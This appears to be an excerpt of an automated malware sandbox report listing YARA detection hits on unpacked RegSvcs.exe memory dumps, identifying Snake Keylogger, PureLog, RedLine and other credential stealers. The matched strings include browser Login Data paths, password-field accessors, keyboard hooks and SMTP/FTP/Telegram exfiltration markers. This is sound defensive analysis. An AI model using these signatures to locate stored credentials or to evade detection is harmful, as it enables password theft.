12.2.RegSvcs.exe.3416458.5.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.3416458.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22022:$a1: get_encryptedPassword 0x21ff6:$a2: get_encryptedUsername 0x220ba:$a3: get_timePasswordChanged 0x21fd2:$a4: get_passwordField 0x22038:$a5: set_encryptedPassword 0x21e05:$a7: get_logins 0x1e4e5:$a10: KeyLoggerEventArgs 0x1e4b4:$a11: KeyLoggerEventArgsEventHandler 0x21ed9:$a13: _encryptedPassword
12.2.RegSvcs.exe.3416458.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27d17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x26f48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2737b:$a4: \Orbitum\User Data\Default\Login Data 0x283bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.3416458.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2090f:$s1: UnHook 0x208ab:$s2: SetHook 0x208e4:$s3: CallNextHook 0x20873:$s4: _hook
12.2.RegSvcs.exe.3416458.5.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2542d:$x1: $%SMTPDV$ 0x23c96:$x2: $#TheHashHere%& 0x23c44:$x3: %FTPDV$ 0x25503:$x4: $%TelegramDv$ 0x1e4b4:$x5: KeyLoggerEventArgs 0x1e4e5:$x5: KeyLoggerEventArgs 0x253f9:$m2: Clipboard Logs ID 0x255ff:$m2: Screenshot Logs ID 0x256cb:$m2: keystroke Logs ID 0x255d7:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.820000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28bff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27e30:$a3: \Google\Chrome\User Data\Default\Login Data 0x28263:$a4: \Orbitum\User Data\Default\Login Data 0x292a4:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.820000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x217f7:$s1: UnHook 0x21793:$s2: SetHook 0x217cc:$s3: CallNextHook 0x2175b:$s4: _hook
9.2.RegSvcs.exe.820000.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26315:$x1: $%SMTPDV$ 0x24b7e:$x2: $#TheHashHere%& 0x24b2c:$x3: %FTPDV$ 0x263eb:$x4: $%TelegramDv$ 0x1f39c:$x5: KeyLoggerEventArgs 0x1f3cd:$x5: KeyLoggerEventArgs 0x262e1:$m2: Clipboard Logs ID 0x264e7:$m2: Screenshot Logs ID 0x265b3:$m2: keystroke Logs ID 0x264bf:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.c30000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.c30000.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.c30000.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.c30000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22022:$a1: get_encryptedPassword 0x21ff6:$a2: get_encryptedUsername 0x220ba:$a3: get_timePasswordChanged 0x21fd2:$a4: get_passwordField 0x22038:$a5: set_encryptedPassword 0x21e05:$a7: get_logins 0x1e4e5:$a10: KeyLoggerEventArgs 0x1e4b4:$a11: KeyLoggerEventArgsEventHandler 0x21ed9:$a13: _encryptedPassword
12.2.RegSvcs.exe.c30000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27d17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x26f48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2737b:$a4: \Orbitum\User Data\Default\Login Data 0x283bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.c30000.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2090f:$s1: UnHook 0x208ab:$s2: SetHook 0x208e4:$s3: CallNextHook 0x20873:$s4: _hook
12.2.RegSvcs.exe.c30000.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2542d:$x1: $%SMTPDV$ 0x23c96:$x2: $#TheHashHere%& 0x23c44:$x3: %FTPDV$ 0x25503:$x4: $%TelegramDv$ 0x1e4b4:$x5: KeyLoggerEventArgs 0x1e4e5:$x5: KeyLoggerEventArgs 0x253f9:$m2: Clipboard Logs ID 0x255ff:$m2: Screenshot Logs ID 0x256cb:$m2: keystroke Logs ID 0x255d7:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.344d370.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.344d370.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.RegSvcs.exe.344d370.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.344d370.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.344d370.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23e22:$a1: get_encryptedPassword 0x23df6:$a2: get_encryptedUsername 0x23eba:$a3: get_timePasswordChanged 0x23dd2:$a4: get_passwordField 0x23e38:$a5: set_encryptedPassword 0x23c05:$a7: get_logins 0x202e5:$a10: KeyLoggerEventArgs 0x202b4:$a11: KeyLoggerEventArgsEventHandler 0x23cd9:$a13: _encryptedPassword
12.2.RegSvcs.exe.344d370.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29b17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x28d48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2917b:$a4: \Orbitum\User Data\Default\Login Data 0x2a1bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.344d370.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2270f:$s1: UnHook 0x226ab:$s2: SetHook 0x226e4:$s3: CallNextHook 0x22673:$s4: _hook
12.2.RegSvcs.exe.344d370.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2722d:$x1: $%SMTPDV$ 0x25a96:$x2: $#TheHashHere%& 0x25a44:$x3: %FTPDV$ 0x27303:$x4: $%TelegramDv$ 0x202b4:$x5: KeyLoggerEventArgs 0x202e5:$x5: KeyLoggerEventArgs 0x271f9:$m2: Clipboard Logs ID 0x273ff:$m2: Screenshot Logs ID 0x274cb:$m2: keystroke Logs ID 0x273d7:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.6a503e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.6a503e.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.RegSvcs.exe.6a503e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.6a503e.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.6a503e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24d0a:$a1: get_encryptedPassword 0x24cde:$a2: get_encryptedUsername 0x24da2:$a3: get_timePasswordChanged 0x24cba:$a4: get_passwordField 0x24d20:$a5: set_encryptedPassword 0x24aed:$a7: get_logins 0x211cd:$a10: KeyLoggerEventArgs 0x2119c:$a11: KeyLoggerEventArgsEventHandler 0x24bc1:$a13: _encryptedPassword
12.2.RegSvcs.exe.6a503e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a9ff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29c30:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a063:$a4: \Orbitum\User Data\Default\Login Data 0x2b0a4:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.6a503e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x235f7:$s1: UnHook 0x23593:$s2: SetHook 0x235cc:$s3: CallNextHook 0x2355b:$s4: _hook
12.2.RegSvcs.exe.6a503e.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28115:$x1: $%SMTPDV$ 0x2697e:$x2: $#TheHashHere%& 0x2692c:$x3: %FTPDV$ 0x281eb:$x4: $%TelegramDv$ 0x2119c:$x5: KeyLoggerEventArgs 0x211cd:$x5: KeyLoggerEventArgs 0x280e1:$m2: Clipboard Logs ID 0x282e7:$m2: Screenshot Logs ID 0x283b3:$m2: keystroke Logs ID 0x282bf:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.3416458.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.3416458.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.RegSvcs.exe.3416458.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.3416458.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.3416458.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23e22:$a1: get_encryptedPassword 0x5ad3a:$a1: get_encryptedPassword 0x23df6:$a2: get_encryptedUsername 0x5ad0e:$a2: get_encryptedUsername 0x23eba:$a3: get_timePasswordChanged 0x5add2:$a3: get_timePasswordChanged 0x23dd2:$a4: get_passwordField 0x5acea:$a4: get_passwordField 0x23e38:$a5: set_encryptedPassword 0x5ad50:$a5: set_encryptedPassword 0x23c05:$a7: get_logins 0x5ab1d:$a7: get_logins 0x202e5:$a10: KeyLoggerEventArgs 0x571fd:$a10: KeyLoggerEventArgs 0x202b4:$a11: KeyLoggerEventArgsEventHandler 0x571cc:$a11: KeyLoggerEventArgsEventHandler 0x23cd9:$a13: _encryptedPassword 0x5abf1:$a13: _encryptedPassword
12.2.RegSvcs.exe.3416458.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29b17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x60a2f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x28d48:$a3: \Google\Chrome\User Data\Default\Login Data 0x5fc60:$a3: \Google\Chrome\User Data\Default\Login Data 0x2917b:$a4: \Orbitum\User Data\Default\Login Data 0x60093:$a4: \Orbitum\User Data\Default\Login Data 0x2a1bc:$a5: \Kometa\User Data\Default\Login Data 0x610d4:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.3416458.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2270f:$s1: UnHook 0x59627:$s1: UnHook 0x226ab:$s2: SetHook 0x595c3:$s2: SetHook 0x226e4:$s3: CallNextHook 0x595fc:$s3: CallNextHook 0x22673:$s4: _hook 0x5958b:$s4: _hook
12.2.RegSvcs.exe.3416458.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2722d:$x1: $%SMTPDV$ 0x5e145:$x1: $%SMTPDV$ 0x25a96:$x2: $#TheHashHere%& 0x5c9ae:$x2: $#TheHashHere%& 0x25a44:$x3: %FTPDV$ 0x5c95c:$x3: %FTPDV$ 0x27303:$x4: $%TelegramDv$ 0x5e21b:$x4: $%TelegramDv$ 0x202b4:$x5: KeyLoggerEventArgs 0x202e5:$x5: KeyLoggerEventArgs 0x571cc:$x5: KeyLoggerEventArgs 0x571fd:$x5: KeyLoggerEventArgs 0x271f9:$m2: Clipboard Logs ID 0x273ff:$m2: Screenshot Logs ID 0x274cb:$m2: keystroke Logs ID 0x5e111:$m2: Clipboard Logs ID 0x5e317:$m2: Screenshot Logs ID 0x5e3e3:$m2: keystroke Logs ID 0x273d7:$m4: \SnakeKeylogger\ 0x5e2ef:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.c30000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.c30000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.RegSvcs.exe.c30000.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.c30000.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.c30000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23e22:$a1: get_encryptedPassword 0x23df6:$a2: get_encryptedUsername 0x23eba:$a3: get_timePasswordChanged 0x23dd2:$a4: get_passwordField 0x23e38:$a5: set_encryptedPassword 0x23c05:$a7: get_logins 0x202e5:$a10: KeyLoggerEventArgs 0x202b4:$a11: KeyLoggerEventArgsEventHandler 0x23cd9:$a13: _encryptedPassword
12.2.RegSvcs.exe.c30000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29b17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x28d48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2917b:$a4: \Orbitum\User Data\Default\Login Data 0x2a1bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.c30000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2270f:$s1: UnHook 0x226ab:$s2: SetHook 0x226e4:$s3: CallNextHook 0x22673:$s4: _hook
12.2.RegSvcs.exe.c30000.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2722d:$x1: $%SMTPDV$ 0x25a96:$x2: $#TheHashHere%& 0x25a44:$x3: %FTPDV$ 0x27303:$x4: $%TelegramDv$ 0x202b4:$x5: KeyLoggerEventArgs 0x202e5:$x5: KeyLoggerEventArgs 0x271f9:$m2: Clipboard Logs ID 0x273ff:$m2: Screenshot Logs ID 0x274cb:$m2: keystroke Logs ID 0x273d7:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.6a503e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.6a503e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.6a503e.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.6a503e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22f0a:$a1: get_encryptedPassword 0x22ede:$a2: get_encryptedUsername 0x22fa2:$a3: get_timePasswordChanged 0x22eba:$a4: get_passwordField 0x22f20:$a5: set_encryptedPassword 0x22ced:$a7: get_logins 0x1f3cd:$a10: KeyLoggerEventArgs 0x1f39c:$a11: KeyLoggerEventArgsEventHandler 0x22dc1:$a13: _encryptedPassword
12.2.RegSvcs.exe.6a503e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28bff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27e30:$a3: \Google\Chrome\User Data\Default\Login Data 0x28263:$a4: \Orbitum\User Data\Default\Login Data 0x292a4:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.6a503e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x217f7:$s1: UnHook 0x21793:$s2: SetHook 0x217cc:$s3: CallNextHook 0x2175b:$s4: _hook
12.2.RegSvcs.exe.6a503e.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26315:$x1: $%SMTPDV$ 0x24b7e:$x2: $#TheHashHere%& 0x24b2c:$x3: %FTPDV$ 0x263eb:$x4: $%TelegramDv$ 0x1f39c:$x5: KeyLoggerEventArgs 0x1f3cd:$x5: KeyLoggerEventArgs 0x262e1:$m2: Clipboard Logs ID 0x264e7:$m2: Screenshot Logs ID 0x265b3:$m2: keystroke Logs ID 0x264bf:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.3415570.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.3415570.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.3415570.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.3415570.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22f0a:$a1: get_encryptedPassword 0x22ede:$a2: get_encryptedUsername 0x22fa2:$a3: get_timePasswordChanged 0x22eba:$a4: get_passwordField 0x22f20:$a5: set_encryptedPassword 0x22ced:$a7: get_logins 0x1f3cd:$a10: KeyLoggerEventArgs 0x1f39c:$a11: KeyLoggerEventArgsEventHandler 0x22dc1:$a13: _encryptedPassword
12.2.RegSvcs.exe.3415570.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x28bff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27e30:$a3: \Google\Chrome\User Data\Default\Login Data 0x28263:$a4: \Orbitum\User Data\Default\Login Data 0x292a4:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.3415570.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x217f7:$s1: UnHook 0x21793:$s2: SetHook 0x217cc:$s3: CallNextHook 0x2175b:$s4: _hook
12.2.RegSvcs.exe.3415570.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x26315:$x1: $%SMTPDV$ 0x24b7e:$x2: $#TheHashHere%& 0x24b2c:$x3: %FTPDV$ 0x263eb:$x4: $%TelegramDv$ 0x1f39c:$x5: KeyLoggerEventArgs 0x1f3cd:$x5: KeyLoggerEventArgs 0x262e1:$m2: Clipboard Logs ID 0x264e7:$m2: Screenshot Logs ID 0x265b3:$m2: keystroke Logs ID 0x264bf:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.820000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.820000.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.RegSvcs.exe.820000.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.820000.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.820000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24d0a:$a1: get_encryptedPassword 0x24cde:$a2: get_encryptedUsername 0x24da2:$a3: get_timePasswordChanged 0x24cba:$a4: get_passwordField 0x24d20:$a5: set_encryptedPassword 0x24aed:$a7: get_logins 0x211cd:$a10: KeyLoggerEventArgs 0x2119c:$a11: KeyLoggerEventArgsEventHandler 0x24bc1:$a13: _encryptedPassword
9.2.RegSvcs.exe.820000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a9ff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29c30:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a063:$a4: \Orbitum\User Data\Default\Login Data 0x2b0a4:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.820000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x235f7:$s1: UnHook 0x23593:$s2: SetHook 0x235cc:$s3: CallNextHook 0x2355b:$s4: _hook
9.2.RegSvcs.exe.820000.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28115:$x1: $%SMTPDV$ 0x2697e:$x2: $#TheHashHere%& 0x2692c:$x3: %FTPDV$ 0x281eb:$x4: $%TelegramDv$ 0x2119c:$x5: KeyLoggerEventArgs 0x211cd:$x5: KeyLoggerEventArgs 0x280e1:$m2: Clipboard Logs ID 0x282e7:$m2: Screenshot Logs ID 0x283b3:$m2: keystroke Logs ID 0x282bf:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.344d370.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.344d370.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.344d370.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.344d370.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22022:$a1: get_encryptedPassword 0x21ff6:$a2: get_encryptedUsername 0x220ba:$a3: get_timePasswordChanged 0x21fd2:$a4: get_passwordField 0x22038:$a5: set_encryptedPassword 0x21e05:$a7: get_logins 0x1e4e5:$a10: KeyLoggerEventArgs 0x1e4b4:$a11: KeyLoggerEventArgsEventHandler 0x21ed9:$a13: _encryptedPassword
12.2.RegSvcs.exe.344d370.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27d17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x26f48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2737b:$a4: \Orbitum\User Data\Default\Login Data 0x283bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.344d370.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2090f:$s1: UnHook 0x208ab:$s2: SetHook 0x208e4:$s3: CallNextHook 0x20873:$s4: _hook
12.2.RegSvcs.exe.344d370.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2542d:$x1: $%SMTPDV$ 0x23c96:$x2: $#TheHashHere%& 0x23c44:$x3: %FTPDV$ 0x25503:$x4: $%TelegramDv$ 0x1e4b4:$x5: KeyLoggerEventArgs 0x1e4e5:$x5: KeyLoggerEventArgs 0x253f9:$m2: Clipboard Logs ID 0x255ff:$m2: Screenshot Logs ID 0x256cb:$m2: keystroke Logs ID 0x255d7:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x23e22:$a1: get_encryptedPassword 0x23df6:$a2: get_encryptedUsername 0x23eba:$a3: get_timePasswordChanged 0x23dd2:$a4: get_passwordField 0x23e38:$a5: set_encryptedPassword 0x23c05:$a7: get_logins 0x202e5:$a10: KeyLoggerEventArgs 0x202b4:$a11: KeyLoggerEventArgsEventHandler 0x23cd9:$a13: _encryptedPassword
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29b17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x28d48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2917b:$a4: \Orbitum\User Data\Default\Login Data 0x2a1bc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2270f:$s1: UnHook 0x226ab:$s2: SetHook 0x226e4:$s3: CallNextHook 0x22673:$s4: _hook
12.2.RegSvcs.exe.6a5f26.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2722d:$x1: $%SMTPDV$ 0x25a96:$x2: $#TheHashHere%& 0x25a44:$x3: %FTPDV$ 0x27303:$x4: $%TelegramDv$ 0x202b4:$x5: KeyLoggerEventArgs 0x202e5:$x5: KeyLoggerEventArgs 0x271f9:$m2: Clipboard Logs ID 0x273ff:$m2: Screenshot Logs ID 0x274cb:$m2: keystroke Logs ID 0x273d7:$m4: \SnakeKeylogger\
9.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.name.exe.7d0000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.name.exe.7d0000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F5 88 44 24 2B 88 44 24 2F B0 0C 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegSvcs.exe.820ee8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.RegSvcs.exe.820ee8.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.820ee8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
9.2.RegSvcs.exe.820ee8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22022:$a1: get_encryptedPassword 0x21ff6:$a2: get_encryptedUsername 0x220ba:$a3: get_timePasswordChanged 0x21fd2:$a4: get_passwordField 0x22038:$a5: set_encryptedPassword 0x21e05:$a7: get_logins 0x1e4e5:$a10: KeyLoggerEventArgs 0x1e4b4:$a11: KeyLoggerEventArgsEventHandler 0x21ed9:$a13: _encryptedPassword
9.2.RegSvcs.exe.820ee8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27d17:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x26f48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2737b:$a4: \Orbitum\User Data\Default\Login Data 0x283bc:$a5: \Kometa\User Data\Default\Login Data
9.2.RegSvcs.exe.820ee8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2090f:$s1: UnHook 0x208ab:$s2: SetHook 0x208e4:$s3: CallNextHook 0x20873:$s4: _hook
9.2.RegSvcs.exe.820ee8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2542d:$x1: $%SMTPDV$ 0x23c96:$x2: $#TheHashHere%& 0x23c44:$x3: %FTPDV$ 0x25503:$x4: $%TelegramDv$ 0x1e4b4:$x5: KeyLoggerEventArgs 0x1e4e5:$x5: KeyLoggerEventArgs 0x253f9:$m2: Clipboard Logs ID 0x255ff:$m2: Screenshot Logs ID 0x256cb:$m2: keystroke Logs ID 0x255d7:$m4: \SnakeKeylogger\
12.2.RegSvcs.exe.3415570.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.3415570.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.RegSvcs.exe.3415570.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.RegSvcs.exe.3415570.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
